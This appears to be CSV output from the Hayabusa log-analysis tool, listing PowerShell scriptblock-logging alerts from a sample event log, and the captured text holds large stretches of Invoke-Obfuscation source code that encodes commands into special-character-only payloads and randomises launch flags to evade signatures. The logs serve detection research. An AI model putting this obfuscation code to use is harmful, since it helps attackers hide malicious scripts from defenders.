2017-08-31 03:15:55.276 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"andlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.276 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"andlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = 
$PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). 
#$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.276 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.279 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedSpecialCharOnlyCommand { <# .SYNOPSIS Generates Special-Character-Only encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. 
All credit for this encoding technique goes to 牟田口大介 (@mutaguchi) who blogged about it in 2010: http://perl-users.jp/articles/advent-calendar/2010/sym/11 Invoke-Obfuscation Function: Out-EncodedSpecialCharOnlyCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedSpecialCharOnlyCommand encodes an input PowerShell scriptblock or path as a Special-Character-Only payload. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedSpecialCharOnlyCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProf -NonIn ""${ }= + $() ; ${ }=${ };${ } = ++ ${ }; ${ }=++${ } ;${ }=++${ };${ } =++ ${ } ; ${ } = ++${ };${ } =++ ${ } ; ${ }= ++${ } ;${ } = ++ ${ } ; ${ }=++ ${ } ;${ }=\""[\""+ \""$( @{ } ) \""[ ${ }]+\""$(@{ })\""[\""${ }${ }\""]+ \""$( @{ } ) \""[\""${ }${ }\""]+ \""$?\""[${ } ] + \""]\"" ;${ } = \""\"".(\""$( @{ } ) \""[\""${ }${ }\"" ] + \""$( @{ } ) \""[ \""${ }${ }\""]+ \""$( @{ } ) \""[${ }] +\""$( @{ } ) \""[${ } ]+ \""$?\""[${ } ] +\""$( @{ } ) \""[${ }] ) ; ${ }= \""$( @{ } ) \""[ \""${ }${ }\""]+ \""$( @{ } ) \""[ ${ }] +\""${ }\""[ \""${ }${ }\""] ; & ${ }( \"" ${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ } +${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }+ ${ }${ }${ } +${ }${ }${ }+${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ } + ${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ } +${ }${ }${ }+ ${ 
}${ }${ }+${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }^|${ } \"" )"" C:\PS> Out-EncodedSpecialCharOnlyCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru ${%``*} = +$() ; ${(\$}=${%``*} ; ${ *}=++ ${%``*};${$)(} = ++${%``*};${ } =++${%``*};${,+]}= ++ ${%``*} ; ${,} =++ ${%``*}; ${!``@} =++${%``*} ;${.} = ++ ${%``*}; ${]\}=++ ${%``*} ;${+}=++${%``*} ;${,-\}=""[""+""$(@{})""[${.}]+ ""$(@{})""[""${ *}${+}"" ]+""$(@{})""[""${$)(}${(\$}"" ] +""$?""[ ${ *}]+ ""]"";${%``*} = """".(""$(@{})""[ ""${ *}${,+]}"" ] +""$(@{})""[""${ *}${!``@}"" ]+ ""$(@{})""[${(\$} ] + ""$(@{})""[ ${,+]}]+ ""$?""[ ${ *}]+""$(@{})""[${ } ] ) ; ${%``*} = ""$(@{})""[""${ *}${,+]}""]+ ""$(@{})""[${,+]}]+ ""${%``*}""[""${$)(}${.}""] ;"" ${%``*} (${,-\}${]\}${.}+${,-\}${ *}${ *}${,+]} + ${,-\}${ *}${(\$}${,}+ ${,-\}${ *}${ *}${!``@}+${,-\}${ *}${(\$}${ *} + ${,-\}${,+]}${,}+ ${,-\}${.}${$)(} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${,}+${,-\}${ *}${ *}${!``@}+ ${,-\}${ }${$)(}+${,-\}${ }${+} +${,-\}${.}${$)(}+${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${(\$}${]\} +${,-\}${ *}${ *}${ *}+${,-\}${ }${$)(}+ ${,-\}${]\}${.}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]} +${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${(\$}${(\$}+ ${,-\}${ }${ } +${,-\}${ }${+} + ${,-\}${ }${$)(}+ ${,-\}${,+]}${,} +${,-\}${.}${(\$} + ${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${ *}+${,-\}${ *}${(\$}${ }+${,-\}${ *}${ *}${,+]}+${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${.}+${,-\}${ *}${ *}${(\$}+ ${,-\}${ *}${(\$}${(\$} +${,-\}${!``@}${.} +${,-\}${ *}${ *}${ *} + ${,-\}${ 
*}${(\$}${]\} +${,-\}${ *}${ *}${ *}+ ${,-\}${ *}${ *}${,+]}+${,-\}${ }${$)(} +${,-\}${.}${ *} + ${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${ *} + ${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${ *}${(\$} + ${,-\}${,}${+}+ ${,-\}${ }${$)(} +${,-\}${]\}${.} + ${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${,}+ ${,-\}${ *}${ *}${!``@} +${,-\}${ *}${(\$}${ *}+${,-\}${,+]}${,}+${,-\}${.}${$)(}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,}+ ${,-\}${ *}${ *}${!``@} + ${,-\}${ }${$)(} +${,-\}${ }${+}+ ${,-\}${.}${+}+ ${,-\}${+}${]\} +${,-\}${ *}${(\$}${$)(} +${,-\}${ *}${ *}${.} + ${,-\}${ *}${ *}${,} +${,-\}${+}${+}+${,-\}${+}${.} +${,-\}${ *}${ *}${!``@}+ ${,-\}${ *}${(\$}${,} +${,-\}${ *}${ *}${ *}+ ${,-\}${ *}${ *}${(\$}+${,-\}${ }${$)(}+ ${,-\}${]\}${$)(} +${,-\}${ *}${ *}${ *} +${,-\}${+}${+}+${,-\}${ *}${(\$}${.} +${,-\}${ *}${ *}${,}+ ${,-\}${ }${ } +${,-\}${ }${+}+ ${,-\}${ }${$)(} + ${,-\}${,+]}${,} + ${,-\}${.}${(\$}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]}+${,-\}${ *}${(\$}${ *} +${,-\}${ *}${(\$}${ }+${,-\}${ *}${ *}${,+]} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${.} + ${,-\}${ *}${ *}${(\$}+${,-\}${ *}${(\$}${(\$}+${,-\}${!``@}${.}+ ${,-\}${ *}${ *}${ *}+${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${,+]} +${,-\}${ }${$)(}+ ${,-\}${.}${ *} + ${,-\}${ *}${ *}${,+]}+${,-\}${ *}${(\$}${ *} +${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${ *}${(\$} )""| .${%``*} .NOTES All credit for this encoding technique goes to 牟田口大介 (@mutaguchi) who blogged about it in 2010: http://perl-users.jp/articles/advent-calendar/2010/sym/11 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Build out variables to obtain 0-9, ""[char]"" and ""iex"" $VariableInstantiationSyntax = @() $VariableInstantiationSyntax += '${;} = + $( ) ; ${=} = ${;} ; ${+} = ++ ${;} ; ${@} = ++ ${;} ; ${.} = ++ ${;} ; ${[} = ++ ${;} ; ${]} = ++ ${;} ; ${(} = ++ ${;} ; ${)} = ++ ${;} ; ${&} = ++ ${;} ; ${|} = ++ ${;} ; ' $VariableInstantiationSyntax += '${;} = + $( ) ; ${=} = ${;} ; ${+} = ++ ${;} ; ${@} = ( ${;} = ${;} + ${+} ) ; ${.} = ( ${;} = ${;} + ${+} ) ; ${[} = ( ${;} = ${;} + ${+} ) ; ${]} = ( ${;} = ${;} + ${+} ) ; ${(} = ( ${;} = ${;} + ${+} ) ; ${)} = ( ${;} = ${;} + ${+} ) ; ${&} = ( ${;} = ${;} + ${+} ) ; ${|} = ( ${;} = ${;} + ${+} ) ; ' $VariableInstantiation = (Get-Random -Input $VariableInstantiationSyntax) ${[Char]} = '${""} = \""[\"" + \""$( @{ } ) \""[ ${)} ] + \""$(@{ })\""[ \""${+}${|}\"" ] + \""$( @{ } ) \""[ \""${@}${=}\"" ] + \""$? 
\""[ ${+} ] + \""]\"" ; ' $OverloadDefinitions = '${;} = \""\"".(\""$( @{ } ) \""[ \""${+}${[}\"" ] + \""$( @{ } ) \""[ \""${+}${(}\"" ] + \""$( @{ } ) \""[ ${=} ] + \""$( @{ } ) \""[ ${[} ] + \""$? \""[ ${+} ] + \""$( @{ } ) \""[ ${.} ] ) ; ' $Iex = '${;} = \""$( @{ } ) \""[ \""${+}${[}\"" ] + \""$( @{ } ) \""[ ${[} ] + \""${;}\""[ \""${@}${)}\"" ] ; ' # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { ${[Char]} = ${[Char]}.Replace('}${','}\"" + \""${') } # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { $OverloadDefinitions = $OverloadDefinitions.Replace('}${','}\"" + \""${') } # 1/2 of the time choose to change above variable string concatenation syntax from ""${var1}${var2}"" to ""${var1}"" + ""${var2}"". # This is so defenders won't place false hope in the presence of high counts of }${ for detecting this obfuscation syntax. If((Get-Random -Input @(0..1))) { $Iex = $Iex.Replace('}${','}\"" + \""${') } # Combine above setup commands. $SetupCommand = $VariableInstantiation + ${[Char]} + $OverloadDefinitions + $Iex # 1/2 of the time choose 'char' | % syntax where only one ';' is needed in the entire command. # 1/2 of the time choose simpler ';' delimiter for each command. If((Get-Random -Input @(0..1))) { # Do not add ':' '?' '>' '<' '|' '&' ':' '^' ""'"" ',' or ' ' to this $NewCharacters list. $NewCharacters = @(';','=','+','@','.','[',']','(',')','-','_','/','\','*','%','$','#','!','``','~') # 1/3 of the time randomly choose using only one random character from above. 
# 2/3 of the time use eleven randomly chosen characters from $NewCharacters defined above. Switch(Get-Random -Input @(1..3)) { 1 {$RandomChar = (Get-Random -Input $NewCharacters); $RandomString = $RandomChar*(Get-Random -Input @(1..6))} default {$RandomString = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..3)))} } # Replace default syntax for multiple commands (using ';') with the syntax of 'char' | % $SetupCommand = '( ' + ""'$RandomString'"" + ' | % { ' + $SetupCommand.Replace(' ; ',' } { ').Trim(' {') + ' ) ; ' } # Convert $ScriptString into a character array and then convert each character into ASCII integer representations substituted with our special character variables for each character. $CharEncoded = ([Char[]]$ScriptString | ForEach-Object {'${""}'+ ([Int]$_ -Replace ""0"",'${=}' -Replace ""1"",'${+}' -Replace ""2"",'${@}' -Replace ""3"",'${.}' -Replace ""4"",'${[}' -Replace ""5"",'${]}' -Replace ""6"",'${(}' -Replace ""7"",'${)}' -Replace ""8"",'${&}' -Replace ""9"",'${|}')}) -Join ' + ' # Randomly choose between . and & invocation operators. $InvocationSyntax = (Get-Random -Input @('.','&')) # Select random ordering for both layers of ""iex"" $CharEncodedSyntax = @() $CharEncodedSyntax += '\"" ' + $CharEncoded + ' ^| ${;} \"" | ' + $InvocationSyntax + ' ${;} ' $CharEncodedSyntax += '\"" ${;} ( ' + $CharEncoded + ' ) \"" | ' + $InvocationSyntax + ' ${;} ' $CharEncodedSyntax += $InvocationSyntax + ' ${;} ( \"" ' + $CharEncoded + ' ^| ${;} \"" ) ' $CharEncodedSyntax += $InvocationSyntax + ' ${;} ( \"" ${;} ( ' + $CharEncoded + ' ) \"" ) ' # Randomly select one of the above commands. $CharEncodedRandom = (Get-Random -Input $CharEncodedSyntax) # Combine variable instantion $SetupCommand and our encoded command. $NewScriptTemp = $SetupCommand + $CharEncodedRandom # Insert random whitespace. 
$NewScript = '' $NewScriptTemp.Split(' ') | ForEach-Object { $NewScript += $_ + ' '*(Get-Random -Input @(0,2)) } # Substitute existing character placement with randomized variables names consisting of randomly selected special characters. $DefaultCharacters = @(';','=','+','@','.','[',']','(',')','&','|','""') # Do not add ':' '?' '>' '<' '|' '&' ':' '_' ',' or '^' to this $NewCharacters list. $NewCharacters = @(';','=','+','@','.','[',']','(',')','-','/',""'"",'*','%','$','#','!','``','~',' ') # 1/3 of the time randomly choose using only one random character from above or using only whitespace for variable names. # 2/3 of the time use eleven randomly chosen characters from $NewCharacters defined above. $UpperLimit = 1 Switch(Get-Random -Input @(1..6)) { 1 {$RandomChar = (Get-Random -Input $NewCharacters); $NewCharacters = @(1..12) | ForEach-Object {$RandomChar*$_}} 2 {$NewCharacters = @(1..12) | ForEach-Object {' '*$_}} default {$UpperLimit = 3} } $NewVariableList = @() While($NewVariableList.Count -lt $DefaultCharacters.Count) { $CurrentVariable = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..$UpperLimit))) -Join '' While($NewVariableList -Contains $CurrentVariable) { $CurrentVariable = (Get-Random -Input $NewCharacters -Count (Get-Random -Input @(1..$UpperLimit))) -Join '' } $NewVariableList += $CurrentVariable } # Select 10 random new variable names and substitute the existing special characters in $NewScript. $NewCharactersRandomOrder = Get-Random -Input $NewCharacters -Count $DefaultCharacters.Count For($i=0; $i -lt $DefaultCharacters.Count; $i++) { $NewScript = $NewScript.Replace(('${' + $DefaultCharacters[$i] + '}'),('${' + $i + '}')) } For($i=$DefaultCharacters.Count-1; $i -ge 0; $i--) { $NewScript = $NewScript.Replace(('${' + $i + '}'),('${' + $NewVariableList[$i]+'}')) } # Remove certain escaping if PassThru is selected. 
If($PSBoundParameters['PassThru']) { If($NewScript.Contains('\""')) { $NewScript = $NewScript.Replace('\""','""') } If($NewScript.Contains('^|')) { $NewScript",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.279 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedSpecialCharOnlyCommand { <# .SYNOPSIS Generates Special-Character-Only encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. All credit for this encoding technique goes to 牟田口大介 (@mutaguchi) who blogged about it in 2010: http://perl-users.jp/articles/advent-calendar/2010/sym/11 Invoke-Obfuscation Function: Out-EncodedSpecialCharOnlyCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedSpecialCharOnlyCommand encodes an input PowerShell scriptblock or path as a Special-Character-Only payload. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. 
.PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedSpecialCharOnlyCommand -ScriptBlock 